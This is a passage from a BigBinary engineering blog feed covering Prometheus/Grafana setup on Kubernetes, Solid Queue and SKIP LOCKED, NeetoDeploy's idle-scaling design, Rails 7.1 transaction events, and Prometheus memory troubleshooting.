NodeIP or LoadBalance service.</p><h2>Exposing Prometheus and Grafana using NodePort services</h2><p>Let's run the following command to expose the<code>Prometheus</code>Kubernetes service:</p><pre><code class="language-bash">kubectl expose service kube-prometheus-stack-prometheus --type=NodePort --target-port=9090 --name=prometheus-node-port-servicekubectl expose service kube-prometheus-stack-grafana --type=NodePort --target-port=3000 --name=grafana-node-port-service</code></pre><p>That command will create new services of<code>NodePort</code>type &amp; make thePrometheusand Grafana is accessible outside the Kubernetes Cluster on ports<code>9090</code> and<code>80</code>.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.59.15_AM.png" alt="Screenshot 2023-11-02 at 11.59.15AM.png"></p><p>As we can see, the <code>grafana-node-port-service</code> and<code>prometheus-node-port-service</code> are successfully created and are being exposed onnode ports <code>32489</code> &amp; <code>30905</code></p><p>Now, we can run this command and get the external IP of any node to access thePrometheus and Grafana:</p><pre><code class="language-jsx">kubectl get nodes -o wide</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.57.17_AM.png" alt="Screenshot 2023-11-02 at 11.57.17AM.png"></p><p>We can use the External-IP and the node ports to access the Prometheus andGrafana dashboards outside the cluster environment.</p><p>Prometheus Dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.04.36_PM.png" alt="Prometheus Dashboard"></p><p>Grafana Dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.04.53_PM.png" alt="Grafana Dashboard"></p><p>Run this command, to get the password for the <strong>admin</strong> user of the Grafanadashboard:</p><pre><code>kubectl get secret --namespace default kube-prometheus-stack-grafana -o jsonpath=&quot;{.data.admin-password}&quot; | base64 --decode ; echo</code></pre><h2>Grafana Dashboard</h2><p>Upon login to the Grafana dashboard, use <code>admin</code>as the username and ourgenerated password. We will see &quot;Welcome to Grafana&quot; homepage as shown below.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.12.04_PM.png" alt="Screenshot 2023-11-02 at 12.12.04PM.png"></p><p>Since we used the Kube Prometheus Stack helm chart, the data source forPrometheus and Alert Manager is added by default.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.18.14_PM.png" alt="Screenshot 2023-11-02 at 12.18.14PM.png"></p><p>We can add more data sources by clicking on the <strong>Add new data source</strong> buttonon the top right side.</p><p>By default, this Helm chart adds multiple dashboards to monitor the health ofthe Kubernetes cluster and its resources.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.22.37_PM.png" alt="Screenshot 2023-11-02 at 12.22.37PM.png"></p><p>Additionally, we also have the option of creating our dashboards from scratch aswell as importing multiple Grafana dashboards provided by the<a href="https://grafana.com/grafana/dashboards/">Grafana library</a>.</p><p>To import a Grafana Dashboard, let's follow these steps:</p><ul><li><p>From this <a href="https://grafana.com/grafana/dashboards/">Grafana library</a>, we canadd any dashboard</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.28.44_PM.png" alt="Screenshot 2023-11-02 at 12.28.44PM.png"></p></li><li><p>Select Dashboard and copy the Dashboard ID</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.34.54_PM.png" alt="Screenshot 2023-11-02 at 12.34.54PM.png"></p></li><li><p>Under <strong>Dashboards</strong> page we can get the <strong>Import</strong> option</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.32.55_PM.png" alt="Screenshot 2023-11-02 at 12.32.55PM.png"></p></li><li><p>Under &quot;Import Dashboard&quot; page, we need to paste the Dashboard IP that wecopied earlier &amp; click on the <strong>Load</strong> button.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.35.39_PM.png" alt="Screenshot 2023-11-02 at 12.35.39PM.png"></p></li><li><p>After clicking on the <strong>Load</strong> button, it will auto-load the dashboard fromthe library after which we can import the dashboard by clicking on the<strong>Import</strong> button.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.37.50_PM.png" alt="Screenshot 2023-11-02 at 12.37.50PM.png"></p></li><li><p>Once the import is complete, well be redirected to the new imported dashboardwhichll also be visible under the Dashboards page.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_12.39.42_PM.png" alt="Screenshot 2023-11-02 at 12.39.42PM.png"></p><p>We can use this Node Exporter dashboard to monitor &amp; observe the health of ournodes present in our Kubernetes Cluster.</p></li></ul><h2>Conclusion</h2><p>In this blog, we learned how to integrate Prometheus and Grafana using the helmchart. We also learned how to import dashboards into Grafana from the<a href="https://grafana.com/grafana/dashboards/">Grafana library</a>.</p><p>In the next blog, we will explore how to integrate<a href="https://grafana.com/oss/loki/">Grafana Loki</a> with Grafana and collect and storeevent-related metrics using the<a href="https://github.com/resmoio/kubernetes-event-exporter">Kubernetes Event Exporter</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Solid Queue & understanding UPDATE SKIP LOCKED]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/solid-queue"/>
      <updated>2024-01-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solid-queue</id>
      <content type="html"><![CDATA[<h2>What is solid queue?</h2><p>Recently, <a href="https://37signals.com/">37signals</a> open sourced<a href="https://dev.37signals.com/introducing-solid-queue">Solid Queue</a>.</p><p>Solid Queue is database based queuing backend for Active Job. In contrastSidekiq and Resque are Redis-based queuing backends.</p><p>In her blog <a href="https://github.com/rosa">Rosa Gutirrez</a> mentioned following lineswhich captured our attention.</p><blockquote><p>In our case, one feature that PostgreSQL has had for quite some time and thatwas finally introduced in MySQL 8, has been crucial to our implementation:</p><p>SELECT ... FOR UPDATE SKIP LOCKED</p><p>This allows Solid Queues workers to fetch and lock jobs without locking otherworkers.</p></blockquote><p>As per her, this feature had been<a href="https://www.postgresql.org/docs/current/sql-select.html#SQL-FOR-UPDATE-SHARE">in PostgreSQL</a>for a while, and now this feature has landed<a href="https://dev.mysql.com/blog-archive/mysql-8-0-1-using-skip-locked-and-nowait-to-handle-hot-rows">in MySQL</a>making it possible to build Solid Queue.</p><p>We had never heard of <code>UPDATE SKIP LOCKED</code> feature either in PostgreSQL or inMySQL. We were wondering what is this <code>UPDATE SKIP LOCKED</code> without which it wasnot possible to build Solid Queue. So we decided to look into it.</p><h2>Processing jobs from a queue</h2><p>Consider a case where we need to build a system where a bunch of jobs need to beprocessed in the background.</p><p>There are a bunch of workers waiting to grab a job and start processing themoment a job becomes available. The challenge is when multiple workers attemptto claim the same job simultaneously how do we ensure that only one of theworkers claims the job for processing. At any point of time, a worker shouldclaim only the &quot;unclaimed&quot; job, and an &quot;unclaimed&quot; job should be claimed by oneand only one worker.</p><p>Here is how one might go about it implementing it.</p><pre><code class="language-sql">START TRANSACTIONSELECT * FROM JOBS WHERE processed='no' LIMIT 1;-- Process the jobCOMMIT;</code></pre><p>With the above code, it's possible that two workers might claim the same job.</p><p>One way to resolve this issue is by marking a particular row as locked forupdate.</p><pre><code class="language-sql">START TRANSACTION;SELECT * FROM JOBS WHERE processed='no' FOR UPDATE LIMIT 1;-- Process the jobCOMMIT</code></pre><p><code>SELECT ... FOR UPDATE</code> locks a particular row, and hence no one else can lockthat record.</p><p>As soon as a new job comes in, multiple workers will execute the above query andwill try to take a lock on that record. The database will ensure that only oneof the workers gets the lock.</p><p>The first worker will take the lock on the record using <code>FOR UPDATE</code>. When otherworkers come to that record and they see that there is a lock <code>FOR UPDATE</code>, theywill wait for the lock to be lifted. Yes, these workers will wait until the lockis released.</p><p>The lock will only be released when the transaction is committed. When thetransaction is committed and the lock is released, then other workers will gethold of the record only to find that the job has already been processed. As youcan see, this is a highly inefficient process.</p><p>That is where <code>FOR UPDATE SKIP LOCKED</code> comes in.</p><h2>SKIP LOCKED skips locked rows</h2><pre><code class="language-sql">START TRANSACTION;SELECT * FROM jobs_table FOR UPDATE SKIP LOCKED LIMIT 1;-- Process the jobCOMMIT;</code></pre><p>Imagine the same scenario here. A job comes in. Multiple workers compete toclaim the job. The database ensures that only one worker gets the lock. Howeverin this case the other workers will move on to the next record. They will notwait. That's what <code>SKIP LOCKED</code> does.</p><p>MySQL has detailed documentation on<a href="https://dev.mysql.com/blog-archive/mysql-8-0-1-using-skip-locked-and-nowait-to-handle-hot-rows/">how SKIP LOCKED works</a>If you want to read in more detail.</p><p>Solid Queue uses <code>FOR UPDATE SKIP LOCKED</code> feature to ensure that a job isclaimed by only one worker.</p><h2>How GoodJob manages job processing without SKIP LOCKED</h2><p><a href="https://github.com/bensheldon/good_job">GoodJob</a> burst into the scene<a href="https://island94.org/2020/07/introducing-goodjob-1-0">around July, 2020</a>.GoodJobs supports only PostgreSQL database because it uses advisory locks toguarantee that no two workers claim the same job.</p><p>PostgreSQL folks understand that the lock mechanism provided by the databasewould not satisfy all the variety of cases that might arise in an application.Advisory locks are a mechanism that allows applications to establish acommunication channel to coordinate actions between different sessions ortransactions. Unlike regular row-level locks enforced by the database system,advisory locks are implemented as a set of low-level functions that applicationscan use to acquire and release locks based on their requirements. We can readmore about it<a href="https://www.postgresql.org/docs/current/explicit-locking.html#ADVISORY-LOCKS">here</a>.</p><p><a href="https://www.postgresql.org/docs/9.1/functions-admin.html#FUNCTIONS-ADVISORY-LOCKS">pg_advisory_lock function</a>will lock the given resource. However, if another session already holds a lock onthe same resourc,e then this function will wait. This is similar to the<code>FOR UPDATE</code> case we saw above.</p><p>However <code>pg_try_advisory_lock function</code> will either obtain the lock immediatelyand return true, or return false if the lock cannot be acquired immediately. Asyou can see, the name has the word <code>try</code>. This function attempts to acquire a lock.If it can't get the lock, then it won't wait. Now this function can be utilizedto build a queuing system.</p><p>Any usage of an advisory lock means the application needs to coordinate action. Itgives more power to the application but it also means more work by theapplication. In contrast, <code>FOR UPDATE SKIP RECORD</code> is natively supported byPostgreSQL.</p><p>Based on the discussions<a href="https://github.com/bensheldon/good_job/issues/896">here</a> and<a href="https://github.com/bensheldon/good_job/discussions/831#discussioncomment-6780579">here</a>,it seems GoodJob is evaluating the possibility of migrating from advisory locksto using <code>FOR UPDATE SKIP LOCKED</code> for better performance. Going through theseissues was quite revealing and I got to learn a lot about things I was unawareof.</p><h2>Delayed job implementation</h2><p><a href="https://github.com/collectiveidea/delayed_job">DelayedJob</a> has been there since2009, long before Sidekiq. It doesn't use <code>SKIP LOCK</code>. Instead it uses a rowlevel locking system by<a href="https://github.com/tobi/delayed_job/blob/719b628bdd54566f80ae3a99c4a02dd39d386c07/lib/delayed/job.rb#L164-L181">updating a field in the job record</a>to indicate that the job is being processed. In short DelayedJob ensures that notwo workers take the same job at the application level without taking any helpin this direction from the database.</p><h2>What about SQLite</h2><p>So far, we discussed PostgreSQL and MySQL. What about SQLite? Does it support<code>SKIP LOCK</code>. No, it doesn't support it, but it's ok. As per the<a href="https://www.sqlite.org/whentouse.html#dbcklst">documentation</a>, it supports<code>only writer at any instant in time</code>.</p><blockquote><p>High Concurrency</p><p>SQLite supports an unlimited number of simultaneous readers, but it will onlyallow one writer at any instant in time. For many situations, this is not aproblem. Writers queue up. Each application does its database work quickly andmoves on, and no lock lasts for more than a few dozen milliseconds. But thereare some applications that require more concurrency, and those applicationsmay need to seek a different solution.</p></blockquote><h2>NOWAIT</h2><p>For completeness, let's discuss the <code>NOWAIT</code> feature. We saw earlier thatif we take a lock on a row using <code>FOR UPDATE</code>, then other workers will wait untilthe lock is released.</p><pre><code class="language-sql">START TRANSACTION;SELECT * FROM JOBS WHERE processed='no' FOR UPDATE NOWAIT LIMIT 1;-- Process the jobCOMMIT</code></pre><p><code>NOWAIT</code> feature allows other transactions to not wait for the lock to bereleased. In this case if a transaction is not able to get a lock on the givenrow then it will raise an error and the application needs to handle the error.</p><p>In contrast, <code>SKIP LOCKED</code> will allow the transaction to move on to the next rowif a lock is already taken.</p><h2>Redis backed queue vs database backed queue</h2><p>Now that we looked at how <code>FOR UPDATE SKIP LOCK</code> helps build queuing systemusing database itself, let's see some pros and cons of each type of queuingsystem.</p><h4>Simplicity and familiarity</h4><p>Database-backed queues are often simpler to set up and manage, especially ifyour application is already using a relational database. There's no need for anadditional dependency like Redis.</p><h4>No Additional Infrastructure</h4><p>Since the job information is stored in the same database as your applicationdata, you don't need to set up and maintain a separate infrastructure like aRedis server.</p><h4>Transactionality</h4><p>Database-backed queues can leverage database transactions, ensuring that boththe job creation and any related database operations are committed or rolledback together. This can be important in scenarios where data consistency iscritical.</p><h4>Modifiability</h4><p>It is easier to modify the jobs stored in the database than Redis, but doing sorequires caution, and it's generally not recommended. In Redis, jobs are oftenstored as serialized data, and modifying them directly is not as straightforwardor common. Redis provides commands to interact with data, but modifying job datadirectly is not a standard practice and could result in data corruption.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we added sleep when idle feature to NeetoDeploy and reduced cost]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps"/>
      <updated>2024-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compellingHeroku alternative. Stay updated by following NeetoDeploy on<a href="https://twitter.com/neetodeploy">Twitter</a> and reading our<a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><h2>What is sleep when idle feature</h2><p>&quot;Sleep when idle&quot; is a feature of NeetoDeploy, which puts the deployedapplication to sleep when there is no hit to the server for 5 minutes. Thishelps reduce the cost of the server.</p><p>&quot;Sleep when idle&quot; feature can be enabled not only for the pull request reviewapplications, but for staging and production applications too. Many folks buildapplications to learn and for hobby. In such cases, there is no point in runningthe server when the server is not likely to get any traffic. Since NeetoDeploybilling is based on the usage &quot;Sleep when idle&quot; feature helps keep the bill lowfor the users.</p><p>Let's say you build something and you deployed to production. You shared it withyour friends. For a day or two you got a bit of traffic, and after that youmoved on to other things. If &quot;sleep when idle&quot; is enabled then you don't need toworry about anything. If the server is not getting any traffic then you will notbe billed.</p><h2>How is Neeto using sleep when idle feature</h2><p>At <a href="https://neeto.com">neeto</a>, we are building 20+ applications at the sametime. It means lots of pull requests for all these products and thus lots of PRreview apps are created.</p><p>For a long time, we were using Heroku to build the review apps. However whenNeetoDeploy started to become stable, we movedto generating PR review apps fromHeroku to NeetoDeploy. This helped reduce cost.</p><h2>How to make deployments sleep when idle?</h2><p>This video describes how &quot;sleep when idle&quot; feature is implemented.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://youtube.com/embed/trn2DJyTjnw&quot;frameborder=&quot;0&quot;title=&quot;How we designed NeetoDeploy's 'sleep when idle' feature&quot;allow=&quot;accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>Keeping the apps running only when they're being used involves two steps:</p><ol><li>Scaling the deployments down and bringing them back up again</li><li>Figuring out when to do the scaling</li></ol><p>The deployments can be scaled easily using the <code>kubectl scale</code> command. Forexample, if we want to turn our deployment off, we can run the following toupdate our deployment to zero replicas, essentially destroying all the pods.</p><pre><code class="language-bash">kubectl scale deployment/nginx --replicas=0</code></pre><p>We can also delete our service, ingress or any other resource we might havecreated for our deployment. The configuration of the deployment itself wouldstill be present in the cluster even when we make it sleep, since the KubernetesDeployment is not deleted.</p><p>When we want to bring our app back up again, we can use the same command to spinup new pods:</p><pre><code class="language-bash">kubectl scale deployment/nginx --replicas=1</code></pre><p>The challenge was to figure out <em>when</em> to do this. We decided that we'd have athreshold based on the time the app is last accessed by users. If theapplication is not accessed for more than five minutes, we consider theapplication to be idle and we will scale it down. It'll be brought back up whena user tries to access it again.</p><h2>Exploring existing solutions</h2><p>There are existing CNCF projects like <a href="https://knative.dev/">Knative</a> and<a href="https://keda.sh/">Keda</a>, which can potentially be used to achieve what we wanthere. We spent some time exploring these but realized that these solutionsweren't exactly suitable for our requirements. Kubernetes also natively has a<code>HPAScaleToZero</code><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates">feature gate</a>which enables the<a href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy#understanding-kubernetes-autoscalers">Horizontal Pod Autoscaler</a>to scale down deployments to zero pods, but this is still in alpha and, hence isnot available in EKS yet.</p><p>Ultimately, we decided to write our own service for achieving this. The entirebackend of NeetoDeploy was designed as<a href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one">a collection of microservices</a>from day one. So it made sense to build our <em>pod idling service</em> as anothermicroservice that runs in our cluster.</p><h2>Figuring out when to make applications sleep</h2><p>To know when applications can be idled, we need to know when people areaccessing the applications from their browsers. Since all the requests toapplications deployed on NeetoDeploy would go through our load balancer, itwould contain the information of when every app was last accessed.</p><p>We use <a href="https://traefik.io/traefik/">Traefik</a> as our load balancer and we usedTraefik's <a href="https://doc.traefik.io/traefik/middlewares/overview/">middlewares</a> toretrieve and process the information of when apps are being accessed. We wrote acustom middleware to send all the request information to the pod idling service,whenever an app is being accessed. The pod idling service would store all theURLs, along with the timestamp at which they were accessed, in a Redis cache.The following graphic shows how the request information would be collected andstored by the pod idling service into its Redis cache, both of which are runningwithin the cluster.</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/pod-idling-new-architecture.png" alt="The architecture of the pod idling service"></p><p>The pod idling service would then filter the apps that were last accessed morethan five minutes ago. It then sends a request to the cluster to scale all theseapps down. We'd also delete any related resources like the Services and theIngressRoutes used to configure networking for the deployments.</p><p>We first tested this by running the service manually, and sure enough, all theinactive deployments are filtered and scaled properly. We then added this as acron job in the pod idling service, which would run every five minutes. Thismeans that no app would run for more than five minutes if they're not beingused.</p><p>But wait! How would we bring the app back up after scaling it down?</p><h2>Building the downtime service</h2><p>As we discussed above, we use Traefik's IngressRoutes to route traffic to theapplication being accessed. We made use of the<a href="https://doc.traefik.io/traefik/v2.10/routing/routers/#priority_1">priority parameter</a>of IngressRoutes to boot up apps that are sleeping. Essentially, we created awildcard Traefik IngressRoute that points to a &quot;downtime service&quot; deployment,which is a React app that serves a message of <code>There's nothing here, yet</code> to letusers know that the app they're trying to access doesn't exist. You can see thisin action if you visit a random URL in NeetoDeploy, say something like<a href="https://nonexistent-appname.neetodeployapp.com">nonexistent-appname.neetodeployapp.com</a></p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service-page.png" alt="The downtime service page"></p><p>Wildcard IngressRoutes have the least priority by default. So if we create a&quot;catch-all&quot; wildcard IngressRoute, any invalid url without an IngressRoute ofits own, can be redirected to a single Service in Kubernetes. This is how we'reredirecting non-existent apps to the page shown above. In the following graphic,we can see how a request to a random URL is routed to the downtime service withthe wildcard IngressRoute.</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service-architecture.png" alt="Architecture of how the downtime service works in NeetoDeploy"></p><p>This also means that if an app is scaled down by the pod idling service and getsits IngressRoute deleted, the next time a user tries to access the app, therequest would instead be routed to the downtime service. We need to handle thescale up logic from the downtime service.</p><p>Whenever a user requests a URL that doesn't have an IngressRoute, there are twopossibilities.</p><ol><li>The app doesn't exist.</li><li>The app exists, but is currently scaled down.</li></ol><p>The downtime service would first check the cluster if the requested app ispresent in the cluster in a sleeping state. If not then the user will be servedthe &quot;There's nothing here, yet&quot; page. If there is a sleeping deployment,however, we boot it back up. The downtime service sends the scale up request tothe cluster. We keep redirecting the user back to the url till the app is up andrunning. This redirection would keep happening until the app is scaled up sincewe create the Service and IngressRoute only after the pods of the app arerunning. At this point, the request will be routed to the correct pod by theapp's IngressRoute, since it has a higher priority than the wildcardIngressRoute of the downtime service. All of these steps are illustrated in theGIF below:</p><p><img src="/blog_images/2024/cost-reduction-in-neeto-deploy-by-turning-off-inactive-apps/downtime-service.gif" alt="Illustration of how the downtime service works"></p><p>This design worked flawlessly and we were able to bring back scaled downapplications with as low as 20-30 seconds of wait time.</p><h2>Conclusion</h2><p>We've been running this setup for almost a year now, and it has been workingsmoothly so far. Pod idling service and the downtime service started as simplermicroservices and continue to evolve, adapting to the increasing demand as wegrow.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email atinvite@neeto.com.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows subscribing to Active Record transaction events for instrumentation]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-allows-subscribing-to-active-record-transaction-events"/>
      <updated>2024-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-allows-subscribing-to-active-record-transaction-events</id>
      <content type="html"><![CDATA[<p>The Active Support instrumentation API provides us with hooks that allow us tochoose to be notified when certain events occur inside our application. Railsprovides a set of built-in events that we can subscribe to.<a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#rails-framework-hooks">Here</a>is the list of framework hooks.</p><p>One of the recent additions to this is the <code>transaction.active_record</code> eventThat is triggered when Active Record-managed transactions occur. This isparticularly useful if you want to build a monitoring system like NewRelic, whereyou need to track and analyze database transactions for performance monitoringand optimization purposes.</p><p>The event payload contains the connection, outcome, and the timing details. Theconnection helps us identify the database where the transaction occurred, whichis particularly valuable in a multi-database environment. The outcome, which maybe one of the following: <code>:commit</code>, <code>:rollback</code>, <code>:restart</code>, or <code>:incomplete</code>signifies the transaction's result.</p><p>To make use of this, we can subscribe to the event in an initializer<code>config/initializers/events.rb</code> like this.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe(  &quot;transaction.active_record&quot;) do |event|  MetricsLogger.record_transaction(event.payload)end</code></pre><p>In the above example, <code>MetricLogger</code> is responsible for recording thetransaction details. It then analyzes and reports slow transactions so thatproper action can be taken. You can modify this to suit your instrumentationneeds.</p><p>Please check out these pull requests -<a href="https://github.com/rails/rails/pull/49192">1</a>,<a href="https://github.com/rails/rails/pull/49262">2</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building the metrics dashboard in NeetoDeploy with Prometheus]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/using-prometheus-in-neeto-deploy"/>
      <updated>2024-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-prometheus-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compellingalternative to Heroku. Stay updated by following NeetoDeploy on<a href="https://twitter.com/neetodeploy">Twitter</a> and reading our<a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>One of the features that we wanted in our cloud deployment platform,<strong>NeetoDeploy</strong> was an application metrics. We decided to use<a href="https://prometheus.io/">Prometheus</a> for building this feature. Prometheus is anopen source monitoring and alerting toolkit and is a CNCF graduated project.Venturing into the Cloud Native ecosystem of projects apart from Kubernetes wassomething we had never done before. We ended up learning a lot about Prometheusand how to use it during the course of building this feature.</p><h2>Initial setup</h2><p>We installed Prometheus in our Kubernetes cluster by writing a deploymentconfiguration YAML and applying it to our cluster. We also provisioned an AWSElastic Block Store volume using a PersistentVolumeClaim to store the metricsdata collected by Prometheus. Prometheus needed a<a href="https://github.com/prometheus/prometheus/blob/main/documentation/examples/prometheus-kubernetes.yml">configuration file</a>where we defined what all targets it will be scraping metrics from. This is aYAML file which we stored in a ConfigMap in our cluster.</p><p>Targets in Prometheus can be anything that exposes metrics data in thePrometheus format at a <code>/metrics</code> endpoint. This can be your applicationservers, Kubernetes API servers or even Prometheus itself. Prometheus wouldscrape the data at the defined <code>scrape_interval</code> and store it in the volume astime series data. This can be queried and visualized in the Prometheus dashboardthat comes bundled in the Prometheus deployment.</p><p>We used <code>kubectl port-forward</code> command to test that Prometheus is workinglocally. Once everything was tested and we confirmed, we exposed Prometheus withan ingress so that we can hit its APIs with that url.</p><p>Initially we had configured the following targets:</p><ol><li><a href="https://github.com/prometheus/node_exporter">node_exporter</a> from Prometheus,which would scrape the metrics of the machine the deployment is running on.</li><li><a href="https://github.com/kubernetes/kube-state-metrics">kube-state-metrics</a> whichwould listen to the Kubernetes API and store metrics of all the objects.</li><li><a href="https://traefik.io/traefik/">Traefik</a> for all the network-related metrics(like the number of requests etc.) since we are using Traefik as our ingresscontroller.</li><li>kubernetes-nodes</li><li>kubernetes-pods</li><li>kubernetes-cadvisor</li><li>kubernetes-service-endpoints</li></ol><p>The last 4 scrape jobs would be collecting metrics from the Kubernetes REST APIrelated to nodes, pods, containers and services respectively.</p><p>For scraping metrics from all of these targets, we had set a resource request of500 MB of RAM and 0.5 vCPU to our Prometheus deployment.</p><p>After setting up all of this, the Prometheus deployment was running fine, and wewere able to see the data from the Prometheus dashboard. Seeing this, we weresatisfied and happily started hacking with PromQL, Prometheus's query language.</p><h2>The CrashLoopBackOff crime scene</h2><p><code>CrashLoopBackOff</code> is when a Kubernetes pod is going into a loop of crashing,restarting itself and then crashing again - and this was what was happening tothe Prometheus deployment we had created. From what we could see, the pod hadcrashed, and when it gets recreated, Prometheus would initialize itself and do areload of the<a href="https://prometheus.io/docs/prometheus/latest/storage/">Write Ahead Log (WAL)</a>.</p><p>The WAL is there for adding additional durability to the database. Prometheusstores the metrics it scrapes in-memory before persisting them to the databaseas chunks, and the WAL makes sure that the in-memory data will not be lost inthe case of a crash. In our case, the Prometheus deployment was crashing and itwould get recreated. It would try to load the data from WAL into memory, andthen crash again before this was completed, leading to the CrashLoopBackOffstate.</p><p>We tried deleting the WAL blocks manually from the volume, even though thiswould incur some data loss. This was able to bring the deployment back up againsince WAL replay needn't be done. The deployment went into CrashLoopBackOffagain after a while.</p><h2>Investigating the error</h2><p>The first line of approach we took was to monitor the CPU, memory, and diskusage of the deployment. The disk usage seemed to be normal. We had provisioneda 100GB volume and it wasn't anywhere near getting used up. The CPU usage alsoseemed normal. The memory usage, however, was suspicious.</p><p>After the pods had crashed initially, we recreated the deployment and monitoredit using kubectl's <code>--watch</code> flag for following all the pod updates. While doingthis we were able to see that the pods were going into CrashLoopBackOff becausethey were getting OOMKilled first. The <code>OOMKilled</code> error in Kubernetes is when apod is terminated because it tries to use more memory than it is allotted in itsresource limits. We were consistently seeing the <code>OOMKilled</code> error so memorymust be the culprit here.</p><p>We added Prometheus itself as a target in Prometheus so that we could monitorthe memory usage of the Prometheus deployment. The following was the generaltrend of how Prometheus's memory was increasing over time. This would go onuntil the memory would cross the specified limit, and then the pod would go intoCrashLoopBackOff.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/memory_usage.png" alt="Memory usage of the Prometheus deployment"></p><p>Now that we knew that memory was the issue, we started looking into what wascausing the memory leak. After talking with some folks from the Kubernetes Slackworkspace, we were asked to look at the TSDB status of the Prometheusdeployment. We monitored the stats in real time and saw that the number of timeseries data stored in the database was growing in tens of thousands by eachsecond! This lined up with the increase in the memory usage graph from earlier.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/tsdb.png" alt="Prometheus TSDB stats"></p><h2>How we fixed it</h2><p>We can calculate the memory requirement for Prometheus based on the number oftargets we are scraping metrics from and the frequency at which we are scrapingthe data. The memory requirement of the deployment is a function of both ofthese parameters. In our case ,this was definitely higher than what we couldafford to allocate (based on the nodegroup's machine type) since we werescraping a lot of data at a scrape interval of 15 seconds, which was set in thedefault configuration for Prometheus.</p><p>We increased the scrape interval to 60 seconds and removed all the targets fromthe Prometheus configuration whose metrics we didn't need for building thedashboard. Within the targets that we were scraping from, we used the<code>metric_relabel_configs</code> option to persist in the database only those metricswhich we needed and to drop everything else. We only needed the<code>container_cpu_usage_seconds_total</code>, <code>container_memory_usage_bytes</code> and the<code>traefik_service_requests_total</code> metrics - so we configured Prometheus so thatonly these three would be stored in our database, and by extension the WAL.</p><p>We redeployed Prometheus after making these changes and the memory showed greatstability afterwards. The following is the memory usage of Prometheus over thelast few days. It has not exceeded 1GB.</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/memory_usage_after_fix.png" alt="Memory usage of the Prometheus deployment after the fix"></p><h2>The aftermath</h2><p>Once Prometheus was stable we were able to build the metrics dashboard with thePrometheus API in a straightforward manner. The metrics dashboard came to usewithin a couple of days, when the staging deployment of<a href="https://neetocode.com/">NeetoCode</a> had faced a downtime. You can see thechanges in the metrics from the time when the outage had occurred</p><p><img src="/blog_images/2024/using-prometheus-in-neeto-deploy/neetocode_metrics.png" alt="NeetoCode metrics showing the downtime"></p><p>The quintessential learning that we got from this experience is to always bewary of the resources that are being used up when it comes to tasks likescraping metrics over an extended period of time. We were scraping all themetrics initially in order to explore everything, even though all the metricswere not being used. But because of this, we were able to read a lot about howPrometheus works internally, and also learn some Prometheus best practices thehard way.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our<a href="https://neetohq.slack.com/">community Slack</a> to chat with us about any 